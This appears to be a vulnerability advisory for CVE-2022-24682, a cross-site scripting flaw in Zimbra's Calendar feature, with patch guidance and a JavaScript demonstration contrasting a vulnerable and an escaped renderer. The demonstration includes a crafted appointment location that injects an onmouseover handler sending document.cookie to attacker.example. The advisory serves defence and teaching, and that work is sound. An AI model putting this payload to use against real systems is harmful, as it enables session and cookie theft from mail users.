PT-2022-4547 · Zimbra · Zimbra Collaboration Suite

Steven Adair +1 · Published 2022-02-09 · Updated 2025-11-04 · CVE-2022-24682

CVSS v3.1: 6.1 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Zimbra Collaboration Suite versions 8.8.x through 8.8.15 patch 29

Description: An issue was discovered in the Calendar feature that allows an attacker to place HTML containing executable JavaScript inside element attributes. The attacker-supplied text is not escaped when the attribute is rendered, so it can close the attribute and inject arbitrary markup into the document (a cross-site scripting flaw). The issue has been exploited in the wild since December 2021.

Recommendations: For Zimbra Collaboration Suite versions 8.8.x through 8.8.15 patch 29, update to version 8.8.15 patch 30 (update 1), which resolves the issue; confirm the installed patch level afterwards with `zmcontrol -v` as the zimbra user. If the update cannot be applied immediately, restrict access to the Calendar feature as a temporary workaround and do not process calendar data from untrusted sources (such as invitations from external senders) until the update is in place.
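The attribute-context injection described above, as an added example that is not Zimbra's code: a hypothetical calendar renderer that concatenates an appointment's location into a `title` attribute, the hardened version that escapes it, and a small attribute tokenizer that shows which attributes a browser would actually see in each case. The appointment fields, the renderer and the attacker host are assumptions for illustration.

```javascript
// Added example (not Zimbra's code): how untrusted text inside an HTML
// attribute breaks out of it, and the escaping that prevents it. The
// renderer, the appointment fields and the attacker host are hypothetical.

// Escape the characters that can terminate an attribute value or open a
// tag. With this applied, a value can never close the quote it sits in.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: appointment data is concatenated straight into markup,
// so a location string can close title="..." and add its own attributes.
function renderApptVulnerable(appt) {
  return `<div class="appt" title="${appt.location}">${appt.subject}</div>`;
}

// Hardened pattern: every untrusted value is escaped for the context it
// lands in (attribute value and element text use the same entity set here).
function renderApptSafe(appt) {
  return `<div class="appt" title="${escapeHtmlAttr(appt.location)}">` +
         `${escapeHtmlAttr(appt.subject)}</div>`;
}

// Extract the attribute names of the first start tag, honouring quoted
// values the way an HTML tokenizer would. This is what the browser "sees".
function attributeNames(html) {
  const tag = /^<[a-zA-Z][^\s>]*([^>]*)>/.exec(html);
  if (!tag) return [];
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>]+))?/g;
  return Array.from(tag[1].matchAll(attrRe), (m) => m[1]);
}

// Constructed attacker-controlled invite: the location closes the title
// attribute, adds an onmouseover handler, and reopens a dummy attribute so
// the remaining markup stays well-formed.
const maliciousAppt = {
  subject: 'Team sync',
  location: '" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)" x="',
};

console.log('vulnerable:', attributeNames(renderApptVulnerable(maliciousAppt)));
console.log('hardened:  ', attributeNames(renderApptSafe(maliciousAppt)));
```

With the vulnerable renderer the tag carries `class`, `title`, `onmouseover` and `x`; with the hardened one it carries only `class` and `title`, because the injected quote arrives as `&quot;` and never ends the attribute. In real browser code, prefer DOM APIs (`el.setAttribute('title', value)`, `el.textContent = value`) over building HTML strings, and remember that escaping is context-specific: a value placed in a URL attribute such as `href` or inside a script block needs different treatment than the entity escaping shown here.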

Exploit · Fix

Weakness Enumeration

Improper Encoding or Escaping of Output (CWE-116)
XSS (CWE-79)

Related Identifiers

BDU:2022-05422
CVE-2022-24682

Affected Products

Zimbra Collaboration Suite